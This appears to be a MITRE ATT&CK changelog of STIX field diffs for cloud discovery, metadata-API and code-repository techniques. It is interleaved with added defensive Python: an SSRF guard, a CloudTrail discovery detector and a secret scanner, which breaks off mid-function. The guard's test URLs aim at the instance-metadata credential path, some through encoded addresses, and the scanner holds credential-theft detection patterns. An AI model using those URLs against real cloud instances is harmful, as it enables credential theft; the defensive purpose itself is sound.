| external_references[3]['description'] | Microsoft. (n.d.). az ad user. Retrieved October 6, 2019. | Google. (n.d.). Retrieved March 16, 2021. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest | https://cloud.google.com/identity/docs/reference/rest |
| external_references[4]['source_name'] | Black Hills Red Teaming MS AD Azure, 2018 | Microsoft AZ CLI |
| external_references[4]['description'] | Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active Directory Leaks via Azure. Retrieved October 6, 2019. | Microsoft. (n.d.). az ad user. Retrieved October 6, 2019. |
| external_references[4]['url'] | https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ | https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest |
| external_references[5]['source_name'] | Google Cloud Identity API Documentation | Microsoft Msolrole |
| external_references[5]['description'] | Google. (n.d.). Retrieved March 16, 2021. | Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019. |
| external_references[5]['url'] | https://cloud.google.com/identity/docs/reference/rest | https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0 |
| external_references[6]['source_name'] | AWS Get Bucket ACL | GitHub Raindance |
| external_references[6]['description'] | Amazon Web Services. (n.d.). Retrieved May 28, 2021. | Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019. |
| external_references[6]['url'] | https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html | https://github.com/True-Demon/raindance |
| x_mitre_contributors[1] | Isif Ibrahima | Isif Ibrahima, Mandiant |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Group: Group Enumeration |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Group: Group Enumeration |
| Old Description | New Description |
|---|---|
An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources.(Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them.
Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. |
An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources.(Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. |
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-02 14:42:19.761000+00:00 | 2022-04-20 19:03:12.977000+00:00 |
| description | An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block).
Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources.(Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. |
An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources.(Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. |
| external_references[1]['source_name'] | Amazon Describe Instance | Expel IO Evil in AWS |
| external_references[1]['description'] | Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020. | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. |
| external_references[1]['url'] | https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html | https://expel.io/blog/finding-evil-in-aws/ |
| external_references[2]['source_name'] | Amazon Describe Instances API | AWS Head Bucket |
| external_references[2]['description'] | Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020. | Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February 14, 2022. |
| external_references[2]['url'] | https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html | https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html |
| external_references[4]['source_name'] | Google Compute Instances | AWS Describe DB Instances |
| external_references[4]['description'] | Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020. | Amazon Web Services. (n.d.). Retrieved May 28, 2021. |
| external_references[4]['url'] | https://cloud.google.com/sdk/gcloud/reference/compute/instances/list | https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html |
| external_references[5]['source_name'] | Microsoft AZ CLI | Amazon Describe Instance |
| external_references[5]['description'] | Microsoft. (n.d.). az ad user. Retrieved October 6, 2019. | Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest | https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html |
| external_references[6]['source_name'] | Expel IO Evil in AWS | Amazon Describe Instances API |
| external_references[6]['description'] | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. | Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020. |
| external_references[6]['url'] | https://expel.io/blog/finding-evil-in-aws/ | https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html |
| external_references[7]['source_name'] | Mandiant M-Trends 2020 | Google Compute Instances |
| external_references[7]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020. |
| external_references[7]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://cloud.google.com/sdk/gcloud/reference/compute/instances/list |
| external_references[8]['source_name'] | AWS Describe DB Instances | Mandiant M-Trends 2020 |
| external_references[8]['description'] | Amazon Web Services. (n.d.). Retrieved May 28, 2021. | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. |
| external_references[8]['url'] | https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html | https://content.fireeye.com/m-trends/rpt-m-trends-2020 |
| x_mitre_contributors[1] | Isif Ibrahima | Praetorian |
| x_mitre_contributors[2] | Praetorian | Isif Ibrahima, Mandiant |
| x_mitre_data_sources[0] | Instance: Instance Metadata | Cloud Storage: Cloud Storage Enumeration |
| x_mitre_detection | Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones. | Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users and enumerations from unknown or malicious IP addresses. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones. |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft AZ CLI', 'description': 'Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.', 'url': 'https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest'} | |
| external_references | {'source_name': 'Malwarebytes OSINT Leaky Buckets - Hioureas', 'description': 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating leaky buckets into your OSINT workflow. Retrieved February 14, 2022.', 'url': 'https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/'} |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Snapshot: Snapshot Metadata | |
| x_mitre_data_sources | Cloud Storage: Cloud Storage Metadata | |
| x_mitre_data_sources | Cloud Storage: Cloud Storage Enumeration | |
| x_mitre_data_sources | Volume: Volume Metadata |
| Old Description | New Description |
|---|---|
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019) If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018) The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254. |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.
|
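The SSRF-to-metadata path described above is closed at the proxy by refusing to fetch link-local destinations, but the check only holds if it survives the alternative spellings of 169.254.169.254 (decimal, hex, IPv4-mapped IPv6) and hostnames that resolve to it. The Python below is an added example, not code from the page or from any cloud provider; the GCP hostname and the AWS IPv6 endpoint are assumptions taken from provider documentation, and FAKE_DNS is a constructed stand-in for name resolution.

```python
"""SSRF guard for a URL-fetching proxy: refuse requests that would reach the
Instance Metadata API.

Added example, not code from the page or any cloud provider.  The GCP
hostname and AWS IPv6 endpoint are assumptions from provider documentation;
FAKE_DNS is a constructed stand-in for name resolution.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# 169.254.169.254 is the de facto endpoint named on the page.  fd00:ec2::254
# (AWS IPv6 IMDS) and metadata.google.internal (GCP) are assumed from
# provider docs; verify them for the providers you actually run on.
METADATA_HOSTS = {"metadata.google.internal", "metadata"}
METADATA_ADDRS = {
    ipaddress.ip_address("169.254.169.254"),
    ipaddress.ip_address("fd00:ec2::254"),
}
# Hosts that look like an IP literal (decimal, hex, dotted) but fail to parse
# are treated as hostile rather than handed to a more permissive parser.
_NUMERIC_HOST = re.compile(r"[0-9][0-9a-fx.]*")

# Constructed resolver: one public name, one rebinding-style name that points
# at the metadata address.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "evil-rebind.example": ["169.254.169.254"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host.lower(), [])


def host_to_address(host):
    """Normalise the spellings of an IP literal an attacker can put in a URL.

    Returns an ip_address, or None when `host` is an ordinary hostname.
    Raises ValueError for numeric-looking hosts the parser rejects.
    """
    h = host.strip("[]").lower()
    try:
        if h.startswith("0x"):
            addr = ipaddress.ip_address(int(h, 16))     # http://0xa9fea9fe/
        elif h.isdigit():
            addr = ipaddress.ip_address(int(h))         # http://2852039166/
        else:
            addr = ipaddress.ip_address(h)
    except ValueError:
        if _NUMERIC_HOST.fullmatch(h):
            raise                                        # e.g. 0251.0376.0251.0376
        return None
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped                          # [::ffff:169.254.169.254]
    return addr


def is_metadata_target(url, resolve=None):
    """True when fetching `url` would reach a metadata endpoint (or cannot be
    shown not to).  `resolve(host)` must return the addresses the name
    resolves to; without one, bare hostnames are refused."""
    host = urlsplit(url).hostname
    if not host:
        return True                                      # unparsable: fail closed
    if host.lower() in METADATA_HOSTS:
        return True
    try:
        addr = host_to_address(host)
    except ValueError:
        return True
    if addr is not None:
        candidates = [addr]
    elif resolve is None:
        return True
    else:
        candidates = [ipaddress.ip_address(a) for a in resolve(host)]
    return any(a in METADATA_ADDRS or a.is_link_local or a.is_loopback
               for a in candidates)


if __name__ == "__main__":
    for url in [
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://2852039166/latest/meta-data/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://metadata.google.internal/computeMetadata/v1/",
        "http://evil-rebind.example/",
        "http://example.com/",
    ]:
        print("BLOCK" if is_metadata_target(url, fake_resolve) else "allow", url)
```

In production, pass a real resolver (for example one built on socket.getaddrinfo) and repeat the check on every redirect hop, since a 302 to the metadata address defeats a check done only on the original URL. On AWS the provider-side complement is requiring IMDSv2 (HttpTokens=required): the session token has to be obtained with a PUT request carrying a TTL header and is bounded by the response hop limit, which a GET-only SSRF through a web proxy cannot do.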
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-31 19:41:06.948000+00:00 | 2022-03-08 21:37:23.589000+00:00 |
| description | Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.
|
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)
If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)
The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.
|
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure. Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure (Citation: List Blobs). |
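The detection guidance in the Cloud Infrastructure Discovery entry above (centralized logging, discovery API calls from new or unexpected users or from unknown IP addresses, a change-management identifier logged with approved work) applies equally to the ACL, group and storage-object enumeration calls named in the surrounding entries. The Python below turns that guidance into runnable detection logic over CloudTrail-style records; it is an added example, not MITRE's or any vendor's code. The log lines, the baseline principal and egress network, the burst threshold and the change-ticket-in-user-agent convention are all constructed for the demonstration.

```python
"""Flag cloud discovery API calls in CloudTrail-style logs.

Added example, not MITRE's code.  The log records, the baseline principal and
network, and the change-ticket-in-user-agent convention are constructed.
"""
import ipaddress
import json
from collections import defaultdict
from datetime import datetime, timedelta

# AWS calls named on the page as infrastructure, ACL and storage discovery.
DISCOVERY_APIS = {
    "DescribeInstances", "ListBuckets", "HeadBucket", "GetPublicAccessBlock",
    "DescribeDBInstances", "GetBucketAcl", "ListObjectsV2",
}

# Constructed baseline: who is expected to enumerate, and from where.
KNOWN_PRINCIPALS = {"arn:aws:iam::111122223333:role/InventoryScanner"}
KNOWN_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed change-management convention: approved work tags the user agent.
CHANGE_TAG = "change-ticket="

# Several distinct discovery calls by one principal inside this window is
# treated as an enumeration sweep rather than a one-off lookup.
BURST_WINDOW = timedelta(minutes=5)
BURST_DISTINCT_APIS = 3

# Constructed CloudTrail-like records, one JSON object per line.
SAMPLE_LOG = """\
{"eventTime":"2022-04-20T10:00:00Z","eventName":"DescribeInstances","eventSource":"ec2.amazonaws.com","userIdentity":{"arn":"arn:aws:iam::111122223333:role/InventoryScanner"},"sourceIPAddress":"203.0.113.10","userAgent":"aws-cli/2.4.0"}
{"eventTime":"2022-04-20T10:01:00Z","eventName":"ListBuckets","eventSource":"s3.amazonaws.com","userIdentity":{"arn":"arn:aws:iam::111122223333:user/contractor"},"sourceIPAddress":"198.51.100.7","userAgent":"aws-cli/2.4.0"}
{"eventTime":"2022-04-20T10:01:30Z","eventName":"GetBucketAcl","eventSource":"s3.amazonaws.com","userIdentity":{"arn":"arn:aws:iam::111122223333:user/contractor"},"sourceIPAddress":"198.51.100.7","userAgent":"aws-cli/2.4.0"}
{"eventTime":"2022-04-20T10:02:00Z","eventName":"ListObjectsV2","eventSource":"s3.amazonaws.com","userIdentity":{"arn":"arn:aws:iam::111122223333:user/contractor"},"sourceIPAddress":"198.51.100.7","userAgent":"aws-cli/2.4.0"}
{"eventTime":"2022-04-20T10:03:00Z","eventName":"DescribeDBInstances","eventSource":"rds.amazonaws.com","userIdentity":{"arn":"arn:aws:iam::111122223333:user/dba"},"sourceIPAddress":"203.0.113.22","userAgent":"aws-cli/2.4.0 change-ticket=CHG0042"}
{"eventTime":"2022-04-20T10:04:00Z","eventName":"PutObject","eventSource":"s3.amazonaws.com","userIdentity":{"arn":"arn:aws:iam::111122223333:user/contractor"},"sourceIPAddress":"198.51.100.7","userAgent":"aws-cli/2.4.0"}
"""


def parse_events(text):
    """Parse JSON-lines records into the few fields the detection needs."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        try:
            ip = ipaddress.ip_address(rec["sourceIPAddress"])
        except ValueError:
            ip = None  # service-initiated calls log a DNS name here
        events.append({
            "time": datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ"),
            "api": rec["eventName"],
            "principal": rec["userIdentity"]["arn"],
            "ip": ip,
            "agent": rec.get("userAgent", ""),
        })
    return events


def detect_discovery(events):
    """Return (principal, api, reasons) for each suspicious discovery call."""
    alerts = []
    history = defaultdict(list)  # principal -> [(time, api)] of discovery calls
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["api"] not in DISCOVERY_APIS:
            continue
        if CHANGE_TAG in ev["agent"]:
            continue  # approved change: identifier was logged with the call
        reasons = []
        if ev["principal"] not in KNOWN_PRINCIPALS:
            reasons.append("unexpected principal")
        if ev["ip"] is None or not any(ev["ip"] in net for net in KNOWN_NETWORKS):
            reasons.append("unknown source IP")
        hist = history[ev["principal"]]
        hist.append((ev["time"], ev["api"]))
        recent = {api for t, api in hist if ev["time"] - t <= BURST_WINDOW}
        if len(recent) >= BURST_DISTINCT_APIS:
            reasons.append("burst of %d distinct discovery APIs" % len(recent))
        if reasons:
            alerts.append((ev["principal"], ev["api"], reasons))
    return alerts


if __name__ == "__main__":
    for principal, api, reasons in detect_discovery(parse_events(SAMPLE_LOG)):
        print(principal, api, "; ".join(reasons))
```

The InventoryScanner role's DescribeInstances and the DBA's ticket-tagged DescribeDBInstances are suppressed by the baseline and the change identifier; the contractor's three different enumeration calls from an address outside the corporate range each produce an alert, and the third also trips the burst rule. Per-principal history is what separates a sweep from routine single lookups, so keep the window and threshold tuned against your own logs.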
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-07 18:19:25.352000+00:00 | 2022-04-11 22:29:43.677000+00:00 |
| x_mitre_contributors[1] | Isif Ibrahima | Isif Ibrahima, Mandiant |
| Old Description | New Description |
|---|---|
| Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. 
Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories. |
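The credential collection described above is just a scan over a checkout for key material, and the same scan run before commit is how the artefact is kept out of the repository in the first place. The Python below is an added example, not code from the page or from any project; the repository snapshot, the rule set and the entropy threshold are constructed for the demonstration (the two AWS values are Amazon's documented placeholder keys, not live credentials).

```python
"""Find credentials committed to source.

Added example, not code from the ATT&CK page or any project.  The sample
files, the rule set and the entropy threshold are constructed; the AWS
values are Amazon's documented placeholder keys.
"""
import math
import re
from collections import Counter, namedtuple

Finding = namedtuple("Finding", "path line rule")

# Constructed repository snapshot: path -> file contents.
SAMPLE_REPO = {
    "app/config.py": 'DB_URL = "postgres://app:hunter2@db.internal/app"\nDEBUG = False\n',
    "deploy/aws.env": ("AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
                       "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"),
    "keys/deploy_rsa": "-----BEGIN RSA PRIVATE KEY-----\nMIIEow...\n-----END RSA PRIVATE KEY-----\n",
    "src/main.py": 'import os\nTOKEN = os.environ["API_TOKEN"]\n',
    "src/settings.py": 'API_KEY = "c8f3b2a19d4e7f6a0b1c"\n',
    "README.md": "Set API_TOKEN in your environment before running.\n",
}

ENTROPY_THRESHOLD = 4.0   # bits per character; tune against your own repos

# Ordered rules: the first one that matches a line wins.
RULES = [
    ("aws-access-key-id", re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")),
    ("private-key", re.compile(r"-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----")),
    ("url-embedded-credential",
     re.compile(r"[a-z][a-z0-9+.\-]*://[^/\s:@]+:[^@\s]+@")),
    ("quoted-secret-assignment",
     re.compile(r"(?i)(?:password|passwd|secret|token|api_key)\w*\s*[=:]\s*['\"][^'\"]{8,}['\"]")),
]
# Candidate for the entropy check: a secret-looking name assigned a long bare
# token, which catches formats no fixed pattern knows about.
_BARE_TOKEN = re.compile(
    r"(?i)(?:secret|token|key|password)\w*\s*[=:]\s*['\"]?([A-Za-z0-9+/=_\-]{20,})")


def shannon_entropy(s):
    """Bits per character of the string's empirical symbol distribution."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify_line(line):
    """Name of the first rule the line trips, or None."""
    for rule, pattern in RULES:
        if pattern.search(line):
            return rule
    m = _BARE_TOKEN.search(line)
    if m and shannon_entropy(m.group(1)) > ENTROPY_THRESHOLD:
        return "high-entropy-secret"
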